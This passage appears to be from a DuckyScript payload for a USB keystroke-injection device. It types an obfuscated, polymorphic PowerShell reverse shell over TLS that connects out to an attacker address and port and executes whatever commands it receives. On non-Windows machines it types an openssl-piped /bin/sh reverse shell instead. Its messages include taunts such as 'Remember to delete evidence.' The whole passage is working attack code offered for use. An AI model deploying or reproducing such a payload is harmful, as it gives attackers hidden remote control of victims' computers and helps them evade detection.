ELSE IF (($RANDOM_LAYER % 8) == 0) THEN
STRING "[!] Established remote access on $env:USERNAME/$env:COMPUTERNAME `n[?] Watch out for powershell -v 2!`n`n"
ELSE IF (($RANDOM_LAYER % 9) == 0) THEN
STRING "[!] $env:USERNAME/$env:COMPUTERNAME messed with the Duck `n[?] Remember to delete evidence.`n`n"
ELSE
STRING "[!] $env:USERNAME/$env:COMPUTERNAME says Quack! `n[+]...and then he waddled away...`n`n"
END_IF
END_FUNCTION
GUI r
DELAY 500
Rolling_Powershell_Execution()
DELAY 300
Polymorphism()
STRING =[Text.Encoding]::UTF8.GetBytes(
Quack_Slogan()
STRING );
Polymorphism2()
REM Section were Address & Port get reflected
STRING =New-Object Net.Sockets.TcpClient( #ADDRESS , #PORT );
STRING $s=
Polymorphism2()
STRING .GetStream();
STRING $sSL=New-Object System.Net.Security.SslStream($s,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]));
STRING $sSL.AuthenticateAsClient('madeby.0iphor13', $null, "Tls12", $false);
Polymorphism3()
STRING =new-object System.IO.StreamWriter($sSL);
STRING $sSL.write(
Polymorphism()
STRING ,0,
Polymorphism()
STRING .Length);
Polymorphism3()
STRING .Write('
REM Identifier
STRING #IDENTIFIER
STRING @PS '+(&('g'+'l'))+'> ');
Polymorphism3()
STRING .flush();[byte[]]
Polymorphism4()
STRING = 0..65535|%{0};while(($i=$sSL.Read(
Polymorphism4()
STRING , 0,
Polymorphism4()
STRING .Length)) -ne 0){$D=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(
Polymorphism4()
STRING ,0, $i);
STRING $Y=(iex $D | Out-String ) 2>&1;$X=$Y + '
REM Identifier
STRING #IDENTIFIER
STRING @PS ' + (Get-LoCatIon).Path + '> ';
STRING $Z=([text.encoding]::UTF8).GetBytes($X);$sSL.Write($Z,0,$Z.Length);
STRING $sSL.Flush()};exit
DELAY 250
ENTER
REM Indicator of successful execution
CAPSLOCK
DELAY 20
CAPSLOCK
ELSE
REM Executing reverse shell when inserted into non-windows box
REM Non-ideal solution for opening terminal (But should work for most unix distros)
DELAY 2000
INJECT_MOD COMMAND
DELAY 2000
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRINGLN which screen >/dev/null && which openssl >/dev/null && screen -md sh -c 'mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect #ADDRESS:#PORT > /tmp/s; rm /tmp/s'
DELAY 1000
STRINGLN exit
END_IF
END_IF_DEFINED